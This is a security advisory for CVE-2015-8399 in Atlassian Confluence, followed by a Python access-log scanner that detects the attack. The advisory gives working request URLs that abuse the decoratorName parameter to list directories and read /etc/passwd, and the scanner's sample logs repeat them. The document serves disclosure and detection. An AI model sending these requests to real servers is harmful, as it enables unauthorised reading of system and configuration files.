Atlassian Confluence arbitrary file include Vulnerability (CVE-2015-8399)

ID SSV:92416
Type seebug
Reporter LoRexxar
Modified 2016-09-14T00:00:00


Affected component: Atlassian Confluence

Atlassian Confluence versions earlier than 5.8.17 contain arbitrary file read and directory traversal vulnerabilities.

The `decoratorName` parameter of `viewdefaultdecorator.action` is passed to the server-side resource lookup without validation:

- `/spaces/viewdefaultdecorator.action?decoratorName=.` lists the current directory
- `/spaces/viewdefaultdecorator.action?decoratorName=/` lists the web service's root directory
- `/spaces/viewdefaultdecorator.action?decoratorName=../` lists the parent directory (does not work on some servers)
- `/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd` reads system files and directories through the `file` protocol

The service does not run as root, which limits the impact, but the web service's configuration files can still be read, so the vulnerability should not be underestimated.
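As an added detection example (not part of the original advisory), the following scanner flags access-log requests to `viewdefaultdecorator.action` whose `decoratorName` value is a directory reference, a traversal sequence, or a `file:` URL, i.e. the probing patterns described above; the log lines are constructed samples in combined-log format.

```python
import re
from typing import List, Optional, Dict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [14/Sep/2016:10:01:02 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=. HTTP/1.1" 200 512
10.0.0.5 - - [14/Sep/2016:10:01:03 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=../ HTTP/1.1" 200 640
10.0.0.5 - - [14/Sep/2016:10:01:04 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1024
10.0.0.6 - - [14/Sep/2016:10:02:00 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=default HTTP/1.1" 200 2048
10.0.0.7 - - [14/Sep/2016:10:03:00 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 4096
"""

# Extracts the request target from the quoted request line of a combined-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_decorator_name(value: str) -> Optional[str]:
    """Return a finding label for a suspicious decoratorName value, or None if it looks benign."""
    v = unquote(value)  # second decode catches double-encoded values
    if v.lower().startswith("file:"):
        return "file-scheme read"
    if v == "." or ".." in v or "/" in v:
        return "directory listing / traversal"
    return None


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Flag requests to viewdefaultdecorator.action that match CVE-2015-8399 probing patterns."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/spaces/viewdefaultdecorator.action"):
            continue
        # parse_qs already percent-decodes each value once.
        for name in parse_qs(parts.query).get("decoratorName", []):
            label = classify_decorator_name(name)
            if label:
                findings.append({"client": line.split()[0],
                                 "decoratorName": unquote(name),
                                 "finding": label})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['client']}: {f['finding']} (decoratorName={f['decoratorName']!r})")
```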